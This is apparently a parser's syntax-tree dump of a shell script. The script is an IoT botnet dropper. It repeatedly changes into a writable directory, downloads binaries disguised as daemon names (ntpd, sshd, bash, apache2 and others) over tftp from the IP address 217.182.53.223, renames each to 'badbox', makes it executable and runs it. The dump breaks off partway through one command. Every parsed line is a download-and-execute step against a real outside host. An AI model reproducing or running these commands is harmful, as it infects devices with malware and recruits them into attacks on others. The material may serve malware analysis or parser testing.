CommandNode(lineno=2, pos=(12, 26), parts=[
  WordNode(lineno=2, pos=(12, 18), word='ulimit'),
  WordNode(lineno=2, pos=(19, 21), word='-n'),
  WordNode(lineno=2, pos=(22, 26), word='1024'),
])
CommandNode(lineno=3, pos=(27, 48), parts=[
  WordNode(lineno=3, pos=(27, 29), word='cp'),
  WordNode(lineno=3, pos=(30, 42), word='/bin/busybox'),
  WordNode(lineno=3, pos=(43, 48), word='/tmp/'),
])
ListNode(lineno=4, pos=(49, 182), parts=[
  CommandNode(lineno=4, pos=(49, 56), parts=[
    WordNode(lineno=4, pos=(49, 51), word='cd'),
    WordNode(lineno=4, pos=(52, 56), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(57, 59)),
  CommandNode(lineno=4, pos=(60, 71), parts=[
    WordNode(lineno=4, pos=(60, 62), word='cd'),
    WordNode(lineno=4, pos=(63, 71), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(72, 74)),
  CommandNode(lineno=4, pos=(75, 82), parts=[
    WordNode(lineno=4, pos=(75, 77), word='cd'),
    WordNode(lineno=4, pos=(78, 82), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(83, 85)),
  CommandNode(lineno=4, pos=(86, 94), parts=[
    WordNode(lineno=4, pos=(86, 88), word='cd'),
    WordNode(lineno=4, pos=(89, 94), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(95, 97)),
  CommandNode(lineno=4, pos=(98, 102), parts=[
    WordNode(lineno=4, pos=(98, 100), word='cd'),
    WordNode(lineno=4, pos=(101, 102), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(102, 103)),
  CommandNode(lineno=4, pos=(104, 140), parts=[
    WordNode(lineno=4, pos=(104, 108), word='tftp'),
    WordNode(lineno=4, pos=(109, 123), word='217.182.53.223'),
    WordNode(lineno=4, pos=(124, 126), word='-c'),
    WordNode(lineno=4, pos=(127, 130), word='get'),
    WordNode(lineno=4, pos=(131, 140), word='privntpd1'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(140, 141)),
  CommandNode(lineno=4, pos=(141, 162), parts=[
    WordNode(lineno=4, pos=(141, 144), word='cat'),
    WordNode(lineno=4, pos=(145, 154), word='privntpd1'),
    RedirectNode(lineno=4, output=
      WordNode(lineno=4, pos=(156, 162), word='badbox'), pos=(155, 162), type='>'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(162, 163)),
  CommandNode(lineno=4, pos=(163, 173), parts=[
    WordNode(lineno=4, pos=(163, 168), word='chmod'),
    WordNode(lineno=4, pos=(169, 171), word='+x'),
    WordNode(lineno=4, pos=(172, 173), word='*'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(173, 174)),
  CommandNode(lineno=4, pos=(174, 182), parts=[
    WordNode(lineno=4, pos=(174, 182), word='./badbox'),
  ]),
])
ListNode(lineno=5, pos=(183, 316), parts=[
  CommandNode(lineno=5, pos=(183, 190), parts=[
    WordNode(lineno=5, pos=(183, 185), word='cd'),
    WordNode(lineno=5, pos=(186, 190), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(191, 193)),
  CommandNode(lineno=5, pos=(194, 205), parts=[
    WordNode(lineno=5, pos=(194, 196), word='cd'),
    WordNode(lineno=5, pos=(197, 205), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(206, 208)),
  CommandNode(lineno=5, pos=(209, 216), parts=[
    WordNode(lineno=5, pos=(209, 211), word='cd'),
    WordNode(lineno=5, pos=(212, 216), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(217, 219)),
  CommandNode(lineno=5, pos=(220, 228), parts=[
    WordNode(lineno=5, pos=(220, 222), word='cd'),
    WordNode(lineno=5, pos=(223, 228), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(229, 231)),
  CommandNode(lineno=5, pos=(232, 236), parts=[
    WordNode(lineno=5, pos=(232, 234), word='cd'),
    WordNode(lineno=5, pos=(235, 236), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(236, 237)),
  CommandNode(lineno=5, pos=(238, 274), parts=[
    WordNode(lineno=5, pos=(238, 242), word='tftp'),
    WordNode(lineno=5, pos=(243, 257), word='217.182.53.223'),
    WordNode(lineno=5, pos=(258, 260), word='-c'),
    WordNode(lineno=5, pos=(261, 264), word='get'),
    WordNode(lineno=5, pos=(265, 274), word='privsshd1'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(274, 275)),
  CommandNode(lineno=5, pos=(275, 296), parts=[
    WordNode(lineno=5, pos=(275, 278), word='cat'),
    WordNode(lineno=5, pos=(279, 288), word='privsshd1'),
    RedirectNode(lineno=5, output=
      WordNode(lineno=5, pos=(290, 296), word='badbox'), pos=(289, 296), type='>'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(296, 297)),
  CommandNode(lineno=5, pos=(297, 307), parts=[
    WordNode(lineno=5, pos=(297, 302), word='chmod'),
    WordNode(lineno=5, pos=(303, 305), word='+x'),
    WordNode(lineno=5, pos=(306, 307), word='*'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(307, 308)),
  CommandNode(lineno=5, pos=(308, 316), parts=[
    WordNode(lineno=5, pos=(308, 316), word='./badbox'),
  ]),
])
ListNode(lineno=6, pos=(317, 456), parts=[
  CommandNode(lineno=6, pos=(317, 324), parts=[
    WordNode(lineno=6, pos=(317, 319), word='cd'),
    WordNode(lineno=6, pos=(320, 324), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(325, 327)),
  CommandNode(lineno=6, pos=(328, 339), parts=[
    WordNode(lineno=6, pos=(328, 330), word='cd'),
    WordNode(lineno=6, pos=(331, 339), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(340, 342)),
  CommandNode(lineno=6, pos=(343, 350), parts=[
    WordNode(lineno=6, pos=(343, 345), word='cd'),
    WordNode(lineno=6, pos=(346, 350), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(351, 353)),
  CommandNode(lineno=6, pos=(354, 362), parts=[
    WordNode(lineno=6, pos=(354, 356), word='cd'),
    WordNode(lineno=6, pos=(357, 362), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(363, 365)),
  CommandNode(lineno=6, pos=(366, 370), parts=[
    WordNode(lineno=6, pos=(366, 368), word='cd'),
    WordNode(lineno=6, pos=(369, 370), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(370, 371)),
  CommandNode(lineno=6, pos=(372, 411), parts=[
    WordNode(lineno=6, pos=(372, 376), word='tftp'),
    WordNode(lineno=6, pos=(377, 391), word='217.182.53.223'),
    WordNode(lineno=6, pos=(392, 394), word='-c'),
    WordNode(lineno=6, pos=(395, 398), word='get'),
    WordNode(lineno=6, pos=(399, 411), word='privopenssh1'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(411, 412)),
  CommandNode(lineno=6, pos=(412, 436), parts=[
    WordNode(lineno=6, pos=(412, 415), word='cat'),
    WordNode(lineno=6, pos=(416, 428), word='privopenssh1'),
    RedirectNode(lineno=6, output=
      WordNode(lineno=6, pos=(430, 436), word='badbox'), pos=(429, 436), type='>'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(436, 437)),
  CommandNode(lineno=6, pos=(437, 447), parts=[
    WordNode(lineno=6, pos=(437, 442), word='chmod'),
    WordNode(lineno=6, pos=(443, 445), word='+x'),
    WordNode(lineno=6, pos=(446, 447), word='*'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(447, 448)),
  CommandNode(lineno=6, pos=(448, 456), parts=[
    WordNode(lineno=6, pos=(448, 456), word='./badbox'),
  ]),
])
ListNode(lineno=7, pos=(457, 590), parts=[
  CommandNode(lineno=7, pos=(457, 464), parts=[
    WordNode(lineno=7, pos=(457, 459), word='cd'),
    WordNode(lineno=7, pos=(460, 464), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(465, 467)),
  CommandNode(lineno=7, pos=(468, 479), parts=[
    WordNode(lineno=7, pos=(468, 470), word='cd'),
    WordNode(lineno=7, pos=(471, 479), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(480, 482)),
  CommandNode(lineno=7, pos=(483, 490), parts=[
    WordNode(lineno=7, pos=(483, 485), word='cd'),
    WordNode(lineno=7, pos=(486, 490), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(491, 493)),
  CommandNode(lineno=7, pos=(494, 502), parts=[
    WordNode(lineno=7, pos=(494, 496), word='cd'),
    WordNode(lineno=7, pos=(497, 502), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(503, 505)),
  CommandNode(lineno=7, pos=(506, 510), parts=[
    WordNode(lineno=7, pos=(506, 508), word='cd'),
    WordNode(lineno=7, pos=(509, 510), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(510, 511)),
  CommandNode(lineno=7, pos=(512, 548), parts=[
    WordNode(lineno=7, pos=(512, 516), word='tftp'),
    WordNode(lineno=7, pos=(517, 531), word='217.182.53.223'),
    WordNode(lineno=7, pos=(532, 534), word='-c'),
    WordNode(lineno=7, pos=(535, 538), word='get'),
    WordNode(lineno=7, pos=(539, 548), word='privbash1'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(548, 549)),
  CommandNode(lineno=7, pos=(549, 570), parts=[
    WordNode(lineno=7, pos=(549, 552), word='cat'),
    WordNode(lineno=7, pos=(553, 562), word='privbash1'),
    RedirectNode(lineno=7, output=
      WordNode(lineno=7, pos=(564, 570), word='badbox'), pos=(563, 570), type='>'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(570, 571)),
  CommandNode(lineno=7, pos=(571, 581), parts=[
    WordNode(lineno=7, pos=(571, 576), word='chmod'),
    WordNode(lineno=7, pos=(577, 579), word='+x'),
    WordNode(lineno=7, pos=(580, 581), word='*'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(581, 582)),
  CommandNode(lineno=7, pos=(582, 590), parts=[
    WordNode(lineno=7, pos=(582, 590), word='./badbox'),
  ]),
])
ListNode(lineno=8, pos=(591, 724), parts=[
  CommandNode(lineno=8, pos=(591, 598), parts=[
    WordNode(lineno=8, pos=(591, 593), word='cd'),
    WordNode(lineno=8, pos=(594, 598), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(599, 601)),
  CommandNode(lineno=8, pos=(602, 613), parts=[
    WordNode(lineno=8, pos=(602, 604), word='cd'),
    WordNode(lineno=8, pos=(605, 613), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(614, 616)),
  CommandNode(lineno=8, pos=(617, 624), parts=[
    WordNode(lineno=8, pos=(617, 619), word='cd'),
    WordNode(lineno=8, pos=(620, 624), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(625, 627)),
  CommandNode(lineno=8, pos=(628, 636), parts=[
    WordNode(lineno=8, pos=(628, 630), word='cd'),
    WordNode(lineno=8, pos=(631, 636), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(637, 639)),
  CommandNode(lineno=8, pos=(640, 644), parts=[
    WordNode(lineno=8, pos=(640, 642), word='cd'),
    WordNode(lineno=8, pos=(643, 644), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(644, 645)),
  CommandNode(lineno=8, pos=(646, 682), parts=[
    WordNode(lineno=8, pos=(646, 650), word='tftp'),
    WordNode(lineno=8, pos=(651, 665), word='217.182.53.223'),
    WordNode(lineno=8, pos=(666, 668), word='-c'),
    WordNode(lineno=8, pos=(669, 672), word='get'),
    WordNode(lineno=8, pos=(673, 682), word='privtftp1'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(682, 683)),
  CommandNode(lineno=8, pos=(683, 704), parts=[
    WordNode(lineno=8, pos=(683, 686), word='cat'),
    WordNode(lineno=8, pos=(687, 696), word='privtftp1'),
    RedirectNode(lineno=8, output=
      WordNode(lineno=8, pos=(698, 704), word='badbox'), pos=(697, 704), type='>'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(704, 705)),
  CommandNode(lineno=8, pos=(705, 715), parts=[
    WordNode(lineno=8, pos=(705, 710), word='chmod'),
    WordNode(lineno=8, pos=(711, 713), word='+x'),
    WordNode(lineno=8, pos=(714, 715), word='*'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(715, 716)),
  CommandNode(lineno=8, pos=(716, 724), parts=[
    WordNode(lineno=8, pos=(716, 724), word='./badbox'),
  ]),
])
ListNode(lineno=9, pos=(725, 858), parts=[
  CommandNode(lineno=9, pos=(725, 732), parts=[
    WordNode(lineno=9, pos=(725, 727), word='cd'),
    WordNode(lineno=9, pos=(728, 732), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(733, 735)),
  CommandNode(lineno=9, pos=(736, 747), parts=[
    WordNode(lineno=9, pos=(736, 738), word='cd'),
    WordNode(lineno=9, pos=(739, 747), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(748, 750)),
  CommandNode(lineno=9, pos=(751, 758), parts=[
    WordNode(lineno=9, pos=(751, 753), word='cd'),
    WordNode(lineno=9, pos=(754, 758), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(759, 761)),
  CommandNode(lineno=9, pos=(762, 770), parts=[
    WordNode(lineno=9, pos=(762, 764), word='cd'),
    WordNode(lineno=9, pos=(765, 770), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(771, 773)),
  CommandNode(lineno=9, pos=(774, 778), parts=[
    WordNode(lineno=9, pos=(774, 776), word='cd'),
    WordNode(lineno=9, pos=(777, 778), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(778, 779)),
  CommandNode(lineno=9, pos=(780, 816), parts=[
    WordNode(lineno=9, pos=(780, 784), word='tftp'),
    WordNode(lineno=9, pos=(785, 799), word='217.182.53.223'),
    WordNode(lineno=9, pos=(800, 802), word='-c'),
    WordNode(lineno=9, pos=(803, 806), word='get'),
    WordNode(lineno=9, pos=(807, 816), word='privwget1'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(816, 817)),
  CommandNode(lineno=9, pos=(817, 838), parts=[
    WordNode(lineno=9, pos=(817, 820), word='cat'),
    WordNode(lineno=9, pos=(821, 830), word='privwget1'),
    RedirectNode(lineno=9, output=
      WordNode(lineno=9, pos=(832, 838), word='badbox'), pos=(831, 838), type='>'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(838, 839)),
  CommandNode(lineno=9, pos=(839, 849), parts=[
    WordNode(lineno=9, pos=(839, 844), word='chmod'),
    WordNode(lineno=9, pos=(845, 847), word='+x'),
    WordNode(lineno=9, pos=(848, 849), word='*'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(849, 850)),
  CommandNode(lineno=9, pos=(850, 858), parts=[
    WordNode(lineno=9, pos=(850, 858), word='./badbox'),
  ]),
])
ListNode(lineno=10, pos=(859, 992), parts=[
  CommandNode(lineno=10, pos=(859, 866), parts=[
    WordNode(lineno=10, pos=(859, 861), word='cd'),
    WordNode(lineno=10, pos=(862, 866), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(867, 869)),
  CommandNode(lineno=10, pos=(870, 881), parts=[
    WordNode(lineno=10, pos=(870, 872), word='cd'),
    WordNode(lineno=10, pos=(873, 881), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(882, 884)),
  CommandNode(lineno=10, pos=(885, 892), parts=[
    WordNode(lineno=10, pos=(885, 887), word='cd'),
    WordNode(lineno=10, pos=(888, 892), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(893, 895)),
  CommandNode(lineno=10, pos=(896, 904), parts=[
    WordNode(lineno=10, pos=(896, 898), word='cd'),
    WordNode(lineno=10, pos=(899, 904), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(905, 907)),
  CommandNode(lineno=10, pos=(908, 912), parts=[
    WordNode(lineno=10, pos=(908, 910), word='cd'),
    WordNode(lineno=10, pos=(911, 912), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(912, 913)),
  CommandNode(lineno=10, pos=(914, 950), parts=[
    WordNode(lineno=10, pos=(914, 918), word='tftp'),
    WordNode(lineno=10, pos=(919, 933), word='217.182.53.223'),
    WordNode(lineno=10, pos=(934, 936), word='-c'),
    WordNode(lineno=10, pos=(937, 940), word='get'),
    WordNode(lineno=10, pos=(941, 950), word='privcron1'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(950, 951)),
  CommandNode(lineno=10, pos=(951, 972), parts=[
    WordNode(lineno=10, pos=(951, 954), word='cat'),
    WordNode(lineno=10, pos=(955, 964), word='privcron1'),
    RedirectNode(lineno=10, output=
      WordNode(lineno=10, pos=(966, 972), word='badbox'), pos=(965, 972), type='>'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(972, 973)),
  CommandNode(lineno=10, pos=(973, 983), parts=[
    WordNode(lineno=10, pos=(973, 978), word='chmod'),
    WordNode(lineno=10, pos=(979, 981), word='+x'),
    WordNode(lineno=10, pos=(982, 983), word='*'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(983, 984)),
  CommandNode(lineno=10, pos=(984, 992), parts=[
    WordNode(lineno=10, pos=(984, 992), word='./badbox'),
  ]),
])
ListNode(lineno=11, pos=(993, 1124), parts=[
  CommandNode(lineno=11, pos=(993, 1000), parts=[
    WordNode(lineno=11, pos=(993, 995), word='cd'),
    WordNode(lineno=11, pos=(996, 1000), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1001, 1003)),
  CommandNode(lineno=11, pos=(1004, 1015), parts=[
    WordNode(lineno=11, pos=(1004, 1006), word='cd'),
    WordNode(lineno=11, pos=(1007, 1015), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1016, 1018)),
  CommandNode(lineno=11, pos=(1019, 1026), parts=[
    WordNode(lineno=11, pos=(1019, 1021), word='cd'),
    WordNode(lineno=11, pos=(1022, 1026), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1027, 1029)),
  CommandNode(lineno=11, pos=(1030, 1038), parts=[
    WordNode(lineno=11, pos=(1030, 1032), word='cd'),
    WordNode(lineno=11, pos=(1033, 1038), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1039, 1041)),
  CommandNode(lineno=11, pos=(1042, 1046), parts=[
    WordNode(lineno=11, pos=(1042, 1044), word='cd'),
    WordNode(lineno=11, pos=(1045, 1046), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1046, 1047)),
  CommandNode(lineno=11, pos=(1048, 1083), parts=[
    WordNode(lineno=11, pos=(1048, 1052), word='tftp'),
    WordNode(lineno=11, pos=(1053, 1067), word='217.182.53.223'),
    WordNode(lineno=11, pos=(1068, 1070), word='-c'),
    WordNode(lineno=11, pos=(1071, 1074), word='get'),
    WordNode(lineno=11, pos=(1075, 1083), word='privftp1'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1083, 1084)),
  CommandNode(lineno=11, pos=(1084, 1104), parts=[
    WordNode(lineno=11, pos=(1084, 1087), word='cat'),
    WordNode(lineno=11, pos=(1088, 1096), word='privftp1'),
    RedirectNode(lineno=11, output=
      WordNode(lineno=11, pos=(1098, 1104), word='badbox'), pos=(1097, 1104), type='>'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1104, 1105)),
  CommandNode(lineno=11, pos=(1105, 1115), parts=[
    WordNode(lineno=11, pos=(1105, 1110), word='chmod'),
    WordNode(lineno=11, pos=(1111, 1113), word='+x'),
    WordNode(lineno=11, pos=(1114, 1115), word='*'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1115, 1116)),
  CommandNode(lineno=11, pos=(1116, 1124), parts=[
    WordNode(lineno=11, pos=(1116, 1124), word='./badbox'),
  ]),
])
ListNode(lineno=12, pos=(1125, 1258), parts=[
  CommandNode(lineno=12, pos=(1125, 1132), parts=[
    WordNode(lineno=12, pos=(1125, 1127), word='cd'),
    WordNode(lineno=12, pos=(1128, 1132), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1133, 1135)),
  CommandNode(lineno=12, pos=(1136, 1147), parts=[
    WordNode(lineno=12, pos=(1136, 1138), word='cd'),
    WordNode(lineno=12, pos=(1139, 1147), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1148, 1150)),
  CommandNode(lineno=12, pos=(1151, 1158), parts=[
    WordNode(lineno=12, pos=(1151, 1153), word='cd'),
    WordNode(lineno=12, pos=(1154, 1158), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1159, 1161)),
  CommandNode(lineno=12, pos=(1162, 1170), parts=[
    WordNode(lineno=12, pos=(1162, 1164), word='cd'),
    WordNode(lineno=12, pos=(1165, 1170), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1171, 1173)),
  CommandNode(lineno=12, pos=(1174, 1178), parts=[
    WordNode(lineno=12, pos=(1174, 1176), word='cd'),
    WordNode(lineno=12, pos=(1177, 1178), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1178, 1179)),
  CommandNode(lineno=12, pos=(1180, 1216), parts=[
    WordNode(lineno=12, pos=(1180, 1184), word='tftp'),
    WordNode(lineno=12, pos=(1185, 1199), word='217.182.53.223'),
    WordNode(lineno=12, pos=(1200, 1202), word='-c'),
    WordNode(lineno=12, pos=(1203, 1206), word='get'),
    WordNode(lineno=12, pos=(1207, 1216), word='privpftp1'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1216, 1217)),
  CommandNode(lineno=12, pos=(1217, 1238), parts=[
    WordNode(lineno=12, pos=(1217, 1220), word='cat'),
    WordNode(lineno=12, pos=(1221, 1230), word='privpftp1'),
    RedirectNode(lineno=12, output=
      WordNode(lineno=12, pos=(1232, 1238), word='badbox'), pos=(1231, 1238), type='>'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1238, 1239)),
  CommandNode(lineno=12, pos=(1239, 1249), parts=[
    WordNode(lineno=12, pos=(1239, 1244), word='chmod'),
    WordNode(lineno=12, pos=(1245, 1247), word='+x'),
    WordNode(lineno=12, pos=(1248, 1249), word='*'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1249, 1250)),
  CommandNode(lineno=12, pos=(1250, 1258), parts=[
    WordNode(lineno=12, pos=(1250, 1258), word='./badbox'),
  ]),
])
ListNode(lineno=13, pos=(1259, 1388), parts=[
  CommandNode(lineno=13, pos=(1259, 1266), parts=[
    WordNode(lineno=13, pos=(1259, 1261), word='cd'),
    WordNode(lineno=13, pos=(1262, 1266), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1267, 1269)),
  CommandNode(lineno=13, pos=(1270, 1281), parts=[
    WordNode(lineno=13, pos=(1270, 1272), word='cd'),
    WordNode(lineno=13, pos=(1273, 1281), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1282, 1284)),
  CommandNode(lineno=13, pos=(1285, 1292), parts=[
    WordNode(lineno=13, pos=(1285, 1287), word='cd'),
    WordNode(lineno=13, pos=(1288, 1292), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1293, 1295)),
  CommandNode(lineno=13, pos=(1296, 1304), parts=[
    WordNode(lineno=13, pos=(1296, 1298), word='cd'),
    WordNode(lineno=13, pos=(1299, 1304), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1305, 1307)),
  CommandNode(lineno=13, pos=(1308, 1312), parts=[
    WordNode(lineno=13, pos=(1308, 1310), word='cd'),
    WordNode(lineno=13, pos=(1311, 1312), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1312, 1313)),
  CommandNode(lineno=13, pos=(1314, 1348), parts=[
    WordNode(lineno=13, pos=(1314, 1318), word='tftp'),
    WordNode(lineno=13, pos=(1319, 1333), word='217.182.53.223'),
    WordNode(lineno=13, pos=(1334, 1336), word='-c'),
    WordNode(lineno=13, pos=(1337, 1340), word='get'),
    WordNode(lineno=13, pos=(1341, 1348), word='privsh1'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1348, 1349)),
  CommandNode(lineno=13, pos=(1349, 1368), parts=[
    WordNode(lineno=13, pos=(1349, 1352), word='cat'),
    WordNode(lineno=13, pos=(1353, 1360), word='privsh1'),
    RedirectNode(lineno=13, output=
      WordNode(lineno=13, pos=(1362, 1368), word='badbox'), pos=(1361, 1368), type='>'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1368, 1369)),
  CommandNode(lineno=13, pos=(1369, 1379), parts=[
    WordNode(lineno=13, pos=(1369, 1374), word='chmod'),
    WordNode(lineno=13, pos=(1375, 1377), word='+x'),
    WordNode(lineno=13, pos=(1378, 1379), word='*'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1379, 1380)),
  CommandNode(lineno=13, pos=(1380, 1388), parts=[
    WordNode(lineno=13, pos=(1380, 1388), word='./badbox'),
  ]),
])
ListNode(lineno=14, pos=(1389, 1520), parts=[
  CommandNode(lineno=14, pos=(1389, 1396), parts=[
    WordNode(lineno=14, pos=(1389, 1391), word='cd'),
    WordNode(lineno=14, pos=(1392, 1396), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1397, 1399)),
  CommandNode(lineno=14, pos=(1400, 1411), parts=[
    WordNode(lineno=14, pos=(1400, 1402), word='cd'),
    WordNode(lineno=14, pos=(1403, 1411), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1412, 1414)),
  CommandNode(lineno=14, pos=(1415, 1422), parts=[
    WordNode(lineno=14, pos=(1415, 1417), word='cd'),
    WordNode(lineno=14, pos=(1418, 1422), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1423, 1425)),
  CommandNode(lineno=14, pos=(1426, 1434), parts=[
    WordNode(lineno=14, pos=(1426, 1428), word='cd'),
    WordNode(lineno=14, pos=(1429, 1434), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1435, 1437)),
  CommandNode(lineno=14, pos=(1438, 1442), parts=[
    WordNode(lineno=14, pos=(1438, 1440), word='cd'),
    WordNode(lineno=14, pos=(1441, 1442), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1442, 1443)),
  CommandNode(lineno=14, pos=(1444, 1479), parts=[
    WordNode(lineno=14, pos=(1444, 1448), word='tftp'),
    WordNode(lineno=14, pos=(1449, 1463), word='217.182.53.223'),
    WordNode(lineno=14, pos=(1464, 1466), word='-c'),
    WordNode(lineno=14, pos=(1467, 1470), word='get'),
    WordNode(lineno=14, pos=(1471, 1479), word='privnut1'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1479, 1480)),
  CommandNode(lineno=14, pos=(1480, 1500), parts=[
    WordNode(lineno=14, pos=(1480, 1483), word='cat'),
    WordNode(lineno=14, pos=(1484, 1492), word='privnut1'),
    RedirectNode(lineno=14, output=
      WordNode(lineno=14, pos=(1494, 1500), word='badbox'), pos=(1493, 1500), type='>'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1500, 1501)),
  CommandNode(lineno=14, pos=(1501, 1511), parts=[
    WordNode(lineno=14, pos=(1501, 1506), word='chmod'),
    WordNode(lineno=14, pos=(1507, 1509), word='+x'),
    WordNode(lineno=14, pos=(1510, 1511), word='*'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1511, 1512)),
  CommandNode(lineno=14, pos=(1512, 1520), parts=[
    WordNode(lineno=14, pos=(1512, 1520), word='./badbox'),
  ]),
])
ListNode(lineno=15, pos=(1521, 1660), parts=[
  CommandNode(lineno=15, pos=(1521, 1528), parts=[
    WordNode(lineno=15, pos=(1521, 1523), word='cd'),
    WordNode(lineno=15, pos=(1524, 1528), word='/tmp'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1529, 1531)),
  CommandNode(lineno=15, pos=(1532, 1543), parts=[
    WordNode(lineno=15, pos=(1532, 1534), word='cd'),
    WordNode(lineno=15, pos=(1535, 1543), word='/var/run'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1544, 1546)),
  CommandNode(lineno=15, pos=(1547, 1554), parts=[
    WordNode(lineno=15, pos=(1547, 1549), word='cd'),
    WordNode(lineno=15, pos=(1550, 1554), word='/mnt'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1555, 1557)),
  CommandNode(lineno=15, pos=(1558, 1566), parts=[
    WordNode(lineno=15, pos=(1558, 1560), word='cd'),
    WordNode(lineno=15, pos=(1561, 1566), word='/root'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1567, 1569)),
  CommandNode(lineno=15, pos=(1570, 1574), parts=[
    WordNode(lineno=15, pos=(1570, 1572), word='cd'),
    WordNode(lineno=15, pos=(1573, 1574), word='/'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1574, 1575)),
  CommandNode(lineno=15, pos=(1576, 1615), parts=[
    WordNode(lineno=15, pos=(1576, 1580), word='tftp'),
    WordNode(lineno=15, pos=(1581, 1595), word='217.182.53.223'),
    WordNode(lineno=15, pos=(1596, 1598), word='-c'),
    WordNode(lineno=15, pos=(1599, 1602), word='get'),
    WordNode(lineno=15, pos=(1603, 1615), word='privapache21'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1615, 1616)),
  CommandNode(lineno=15, pos=(1616, 1640), parts=[
    WordNode(lineno=15, pos=(1616, 1619), word='cat'),
    WordNode(lineno=15, pos=(1620, 1632), word='privapache21'),
    RedirectNode(lineno=15, output=
      WordNode(lineno=15, pos=(1634, 1640), word='badbox'), pos=(1633, 1640), type='>'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1640, 1641)),
  CommandNode(lineno=15, pos=(1641, 1651), parts=[
